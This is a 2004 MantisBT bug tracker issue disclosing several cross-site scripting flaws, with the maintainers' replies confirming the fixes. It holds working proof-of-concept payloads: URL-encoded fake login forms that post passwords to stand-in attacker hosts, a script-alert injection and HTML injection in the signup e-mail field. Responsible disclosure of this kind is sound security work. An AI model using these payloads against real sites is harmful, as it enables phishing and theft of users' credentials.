View Issue Details

IDProjectCategoryView StatusLast Update
0004062mantisbtsecuritypublic2006-10-09 11:55
Reporterjoxeanpiti Assigned Tovboctor  
PrioritynormalSeveritymajorReproducibilityalways
Status closedResolutionfixed 
Product Version0.19.0a1 
Fixed in Version0.19.0rc1 
Summary0004062: Multiple Cross Site Scripting Vulnerabilities
Description

I found multiple XSS vulnerabilities. The problems are always the same, incorrectly sanitization of the passed parameters.

In the "Additional Information" field I put 3 proof of concept to test this possible attacks.

Additional Information

Multiple Cross Site Scripting Vulnerabilities


1.- (RE-)LOGIN XSS VULNERABILITY

-The first vulnerability that I found is this : You can login in anonymously and, when you want to perform a privileged
action you need to re-login with any valid user. The previous URL is passed as the return parameter to the login_page.php script. This parameter is not correctly sanitized when showing/parsing and we can put any html/script code
that we want. To try the first vulnerability copy the following text and paste in the location bar of your favourite web
browser :

http://bugs.mantisbt.org/login_page.php?return=%22%3E%3Ch1%3EHello!%3C/h1%3E%3Cform%20action=%22http://malicious.site.com/script.xxx%22%3EPlease%20type%20your%20password%20:%20%3Cinput%20type=%22password%22%20name=%22your_password%22%3E%3Cbr%3E%3Cinput%20type=%22submit%22%20value=%22Give%20me%20your%20password,%20please...%22%3E%3C/form%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E


2.- REGISTER NEW USER XSS VULNERABILITY

-The second XSS problem is in the script signup.php (for example, http://bugs.mantisbt.org/signup.php). This scripts registers
a new user. The problem is that the script's doesn't sanitize properly the passed e-mail when showing/parsing. Now, we have
the second XSS problem that I found. To test it, please follow these steps :

- Navigate to http://bugs.mantisbt.org/signup_page.php
- In the username field type any username that you want
- In the e-mail field type this text : 

    <h1>hi</h1><br><br><br><br><br><br><br><br><br><br><br><br>

- The page will be show the simple "hi" message but we can create a simple web-form or insert any malicious script.

3.- SELECT PROJECT XSS VULNERABILITY

-I will no explicate the problem because is the same all times. Try the following URL please :

http://bugs.mantisbt.org/login_select_proj_page.php?ref=%3Cbr%3E%3Cform%20action=%22http://my.fucking.site/xxx.sss%22%3E%3Ctable%3E%3Ctr%3E%3Ctd%3EUsername:%3C/td%3E%3Ctd%3E%3Cinput%20type=text%20name=user%3E%3C/tr%3E%3Ctr%3E%3Ctd%3EPassword:%3C/td%3E%3Ctd%3E%3Cinput%20type=password%20name=pass%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%20colspan=2%3E%3Cinput%20type=submit%20%20value=%22login%22%20onclick=%22javascript:alert('hi')%22%3E%3C/td%3E%3C/tr%3E%3C/form%3E

TagsNo tags attached.

Relationships

has duplicate 0004060 closedvboctor Multiple Cross Site Scripting Vulnerabilities 
has duplicate 0004061 closedvboctor Multiple Cross Site Scripting Vulnerabilities 
child of 0003987 closedvboctor Mantis 0.19.0 Release 

Activities

joxeanpiti

joxeanpiti

2004-07-10 11:46

reporter   ~0005973

Last edited: 2004-07-10 11:47

I found the 4st XSS vulnerability. Try the following URL :

http://bugs.mantisbt.org/view_all_set.php?type=1&reporter_id=5031&hide_status=80<script>alert('hi')</script>

edited on: 07-10-04 11:47

Narcissus

Narcissus

2004-07-11 00:42

reporter   ~0005977

I just checked in some code to address the 4th issue, mentioned in the bugnotes.

vboctor

vboctor

2004-08-01 10:19

manager   ~0006529

Thanks JoxeanKoret. The issues you reported are now fixed in the CVS version. Please let us know if you find further problems.